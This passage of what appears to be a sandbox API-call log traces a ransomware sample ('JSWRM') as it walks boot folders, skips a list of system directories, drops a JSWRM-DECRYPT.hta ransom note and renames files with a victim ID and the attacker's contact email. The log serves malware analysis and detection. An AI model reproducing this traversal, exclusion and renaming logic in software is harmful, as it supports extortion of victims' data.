GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234336960) returned 0 [0063.668] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.668] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.668] CloseHandle (hObject=0xffffffff) returned 1 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0063.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0063.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0063.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0063.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.669] MoveFileW (lpExistingFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.669] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.669] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0063.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.669] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="da-DK", cAlternateFileName="")) returned 1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2=".") returned 1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="..") returned 1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="...") returned 1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="windows") returned -1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="recovery") returned -1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="perflogs") returned -1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="documents and settings") returned -1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="$RECYCLE.BIN") returned 1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="system volume information") returned -1 [0063.669] lstrcmpiW (lpString1="da-DK", lpString2="msocache") returned -1 [0063.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.670] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\da-dk\\jswrm-decrypt.hta")) returned 0xffffffff [0063.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0063.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.686] CreateFileW (lpFileName="C:\\Boot\\da-DK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\da-dk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.688] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.688] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.689] CloseHandle (hObject=0x450) returned 1 [0063.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0063.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0063.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.690] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\da-dk\\jswrm-decrypt.hta")) returned 0x20 [0063.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0063.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.690] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c9ecc1b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0063.690] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.690] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c9ecc1b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.691] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.691] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.691] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.692] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.692] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243128) returned 0 [0063.692] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.693] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.693] CloseHandle (hObject=0xffffffff) returned 1 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0063.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0063.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0063.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0063.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0063.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.693] MoveFileW (lpExistingFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.694] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9ecc1b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1c9ecc1b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1c9ecc1b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.694] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.694] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.694] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.694] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.695] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: 